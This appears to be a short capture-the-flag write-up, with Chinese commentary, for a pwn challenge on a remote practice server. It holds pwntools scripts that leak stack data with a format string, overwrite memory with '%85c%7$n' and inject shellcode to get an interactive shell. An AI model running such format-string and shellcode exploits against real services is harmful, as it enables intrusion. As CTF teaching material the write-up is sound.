from pwn import * re = remote('111.200.241.244',62322) context(arch = 'amd64', os = 'linux', log_level = 'debug') re.recvuntil('secret[0] is ') v4_addr = int(re.recvuntil('\n')[:-1], 16) re.sendlineafter("What should your character's name be:", 'cxk') re.sendlineafter("So, where you will go?east or up?:", 'east') re.sendlineafter("go into there(1), or leave(0)?:",'1') re.sendlineafter("'Give me an address'", str(int(v4_addr))) re.sendlineafter("And, you wish is:", 'AAAA'+'-%p'*10) re.recvuntil('I hear it')
我们观察返回来的数据:
AAAA-0x7f3cf04206a3-0x7f3cf0421780-0x7f3cf01522c0-0x7f3cf0648700-0x7f3cf0648700-0x100000022-0x22ea010-0x2d70252d41414141-0x70252d70252d7025-0x252d70252d70252dI hear it, I hear it…\n’
from pwn import * re = remote("111.200.241.244","62322") context(arch = 'amd64', os = 'linux' , log_level = 'debug') re.recvuntil('secret[0] is ') v4_addr = int(re.recvuntil('\n')[:-1], 16) re.sendlineafter("What should your character's name be:", 'cxk') re.sendlineafter("So, where you will go?east or up?:", 'east') re.sendlineafter("go into there(1), or leave(0)?:", '1') re.sendlineafter("'Give me an address'", str(int(v4_addr))) re.sendlineafter("And, you wish is:", '%85c%7$n') shellcode = asm(shellcraft.sh()) re.sendlineafter("USE YOU SPELL", shellcode) re.interactive()